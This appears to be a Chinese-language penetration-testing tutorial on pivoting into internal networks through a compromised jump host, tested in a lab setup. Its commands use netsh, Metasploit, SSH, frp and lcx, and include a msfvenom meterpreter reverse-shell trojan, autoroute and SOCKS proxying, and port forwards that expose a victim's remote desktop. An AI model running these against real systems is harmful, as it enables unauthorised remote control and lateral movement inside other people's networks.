隧道
当我们入侵到内网中拿下一台主机时,为了扩大危害范围,通常会对内网中存活的主机进行扫描,但是扫描到的机器因为与我们网段不同无法通信,这时就需要通过可以通内外网的多网卡的机器来当作跳板进入到内网中,打开进入目标内网的隧道
windows端口转发
实验环境
攻击机(kali)==》跳板机(win2008)==》受害机(win2012)
利用windows自带的netsh端口映射
跳板机
跳板机添加转发规则
当其他机器访问本机的指定端口时转发到受害机的指定端口
netsh interface portproxy add v4tov4 listenport=(跳板机端口) connectaddress=(受害机端口) connectport=(受害机ip)
查看规则
netsh interface portproxy show all
这时我们能够访问跳板机的机器也同时能访问受害机了
攻击机
生成windows反向连接小马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(跳板机内网ip)LPORT=(跳板机端口) -f exe > shell.exe
开启msf控制台
msfconsole
使用监听模块
use exploit/multi/handler
设置监听模式
set payload windows/meterpreter/reverse_tcp
设置本机监听地址
set lhost (攻击机 IP)
设置本机监听端口
set lport (攻击机 端口)
运行
run
受害机
运行木马
因为攻击机与受害机网段不同,所以受害机无法反向连接攻击机,所以利用跳板机做流量转发来建立连接,现在攻击机通过监听自己的端口就能控制受害机了
MSF隧道建立与BP抓包
当想要抓其内网机器数据包时,因为与内网机器不相通,所以需要打通隧道来达到目的
实验环境
BP机(win10)==》攻击机(kali)==》跳板机(win2008)==》受害机(win2012)
msf隧道建立
通过上面的步骤我们已经能让受害机通过MSF在攻击机上面上线了
进入MSF的监听成功的视图
run autoroute
run autoroute -s 12.12.12.0/24//添加路由
run autoroute -p //查看路由
bg//在后台挂起会话
route add (受害机网段) (受害机子网掩码) (session会话序号)//添加路由
route print//查看路由
use auxiliary/server/socks_proxy//使用socks代理模块
run //使用默认配置运行就可以了
编辑proxychains的配置文件,这里我们用socks5版本和1080端口,修改最后一行
vim /etc/proxychains4.conf ====>> socks5 (kali IP) 1080
proxychains namp -sT (受害机ip) //使用namp测试连接
proxychains firefox (受害机网站) //使用firefox测试连接
BP抓包(基于msf隧道建立)
BP机安装SocksCap
使用SocksCap代理工具将攻击机设置为全局代理
修改BP的user options 设置 upstream proxy server添加
destination host为* //允许所有连接
proxy host为127.0.0.1
proxy post为(sockscap的默认端口)25378
msf的端口转发工具
msf也有自带的端口转发可以用
实验环境
BP机(win10)==》攻击机(kali)==》跳板机(win2008)==》受害机(win2012)
先从攻击机用msf连接到跳板机并开启其开启远程桌面
然后在MSF的监听成功的视图为跳板机开启端口转发
portfwd add -L (本机ip) -l (本机端口) -p (目标机端口) -r (目标机ip)
现在在攻击机就能远程连接到受害机的远程桌面了
rdesktop (目标机ip):(目标机端口)
SSH隧道
实验环境
kali(攻击机)==》ubuntu(跳板机)==》win2012(受害机)
正向连接
攻击机
ssh远程连接
ssh -L (本地端口):(受害机ip):(受害机端口) (跳板机账户)@(跳板机ip)
反向连接
跳板机
编辑ssh配置文件
vim /etc/ssh/sshd_config
在port下面添加GatewayPorts yes
ssh -R 本地端口:(受害机ip):(受害机端口) (跳板机账户)@(跳板机外网ip)
Frp
实验环境
kali(攻击机)==》ubuntu(VPS)==》win2012(受害机)
VPS
./frps -c frps.ini //运行服务端
受害机
配置frpc.ini
[common]
server_addr = (VPS的ip) server_port = (VPS frps.ini的端口)
[(随便起个名 3389)]
type = tcp
local_ip = 127.0.0.1
local_port = (客户端开放的端口 3389) remote_port = (让VPS开放的端口 6000)
frpc //运行客户端
攻击机
rdesktop (VPS ip):6000 //远程桌面连接到受害机
LCX
实验环境
ubuntu==》win10
ubuntu
make //编译
./lcx - listen 4444 5555 //当5555端口被访问时转发到4444端口
win10
lcx.exe -slave (ubuntu ip) 4444 127.0.0.1 80 //接收ubuntu4444端口流量到本机80
ubuntu
访问127.0.0.1:5555 //相当于访问win10的80端口
发现沙发条评论